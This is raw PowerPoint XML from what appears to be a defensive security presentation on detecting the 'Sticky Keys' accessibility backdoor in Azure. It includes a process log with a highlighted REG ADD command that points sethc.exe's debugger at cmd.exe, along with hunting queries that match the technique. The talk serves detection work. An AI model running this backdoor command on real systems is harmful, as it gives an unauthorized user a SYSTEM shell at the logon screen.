                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t> party == 3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" baseline="30000" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>rd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t> party</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148998" y="3059744"/>
            <a:ext cx="9146858" cy="3719513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3431959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Innovate in defense by harnessing economic trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12402099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“Sticky Keys” Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809585" y="4105796"/>
            <a:ext cx="3619209" cy="27204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074" y="4047581"/>
            <a:ext cx="2901434" cy="12030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074" y="5431401"/>
            <a:ext cx="3169955" cy="1623992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="17184145" flipV="1">
            <a:off x="4616020" y="4308789"/>
            <a:ext cx="1550540" cy="1496839"/>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FFC000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1492094" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1632" kern="0" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="4415855">
            <a:off x="4703449" y="5532701"/>
            <a:ext cx="1550540" cy="1496839"/>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FF0000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1492094" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1632" kern="0" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176978" y="1492946"/>
            <a:ext cx="7570019" cy="2562522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048090" y="2990458"/>
            <a:ext cx="812636"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31606" y="3274294"/>
            <a:ext cx="4107445"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Sticky Keys Attack in Azure [MS Subscriptions]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252724" y="2245327"/>
            <a:ext cx="11410875" cy="3360404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2016-04-11 16:35:22.4527963 winlogon.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  2016-04-11 16:35:22.4527963 winlogon.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    2016-04-11 16:35:23.0309213 """LogonUI.exe"" /flags:0x0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    2016-04-11 16:35:27.1090463 C:\Windows\system32\userinit.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      2016-04-11 16:35:27.5152963 C:\Windows\Explorer.EXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2016-04-11 16:35:35.1246395 """C:\Windows\System32\ie4uinit.exe"" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EnableTLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        2016-04-11 16:35:35.1402644 """C:\Windows\System32\ie4uinit.exe"" -DisableSSL3"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        2016-04-11 16:35:35.1402644 """C:\Windows\System32\regsvr32.exe"" /s /n /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i:U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> shell32.dll"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        2016-04-11 16:35:35.7183857 """C:\Windows\System32\rundll32.exe"" C:\Windows\system32\mscories.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        2016-04-11 16:35:36.1871327 C:\Windows\SysWOW64\runonce.exe /Run6432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          2016-04-11 16:35:36.3746315 """C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe"" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>StartedFromRunKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        2016-04-11 16:35:39.1714886 """C:\Windows\explorer.exe"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        2016-04-11 16:36:03.4213334 """C:\Windows\System32\cmd.exe"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          2016-04-11 16:36:15.2181329 "REG  ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe"""</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252725" y="1391912"/>
            <a:ext cx="12182868" cy="1054846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9932CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProdProcessCreationEvents</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NewProcessName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endswith</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"\\reg.exe"</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"Image File Execution Options"</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and</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 add "</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"\\sethc.exe"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or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"\\magnify.exe"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or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"\\utilman.exe"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or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contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B22222"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"\\osk.exe"</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project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</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TimeCreated</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NewProcessName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CommandLine</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SubjectUserName</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SubjectLogonId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1224" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252724" y="5547191"/>
            <a:ext cx="11546035" cy="862712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597"/>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9932CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProdProcessCreationEvents</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C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</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"2e5d8c75-18cc-45d3-b580-7e09a91232fa"</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TimeCreated</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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datetime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(2016-04-11 16:25:15.2181329) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="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and</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TimeCreated</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&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datetime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(2016-04-17 16:50:15.2181329)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C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Computer</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SubjectUserName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NewProcessName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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endswith</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u="sng" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>\\cmd.exe</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where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CommandLine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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contains</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err="1">
                <a:solidFill>
                  <a:srgbClr val="B22222"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sethc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B22222"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>project</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a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Subscription</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TimeCreated</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NewProcessName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CommandLine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SubjectUserName</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C71585"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SubjectLogonId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="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endPar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252724" y="6394730"/>
            <a:ext cx="9396992" cy="606488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597"/>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0" err="1">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TimeCreated</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32" kern="0" dirty="0" err="1">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CommandLine</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32" kern="0" dirty="0" err="1">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SubjectLogonId</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597"/>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2016-04-16 18:59   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1632" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
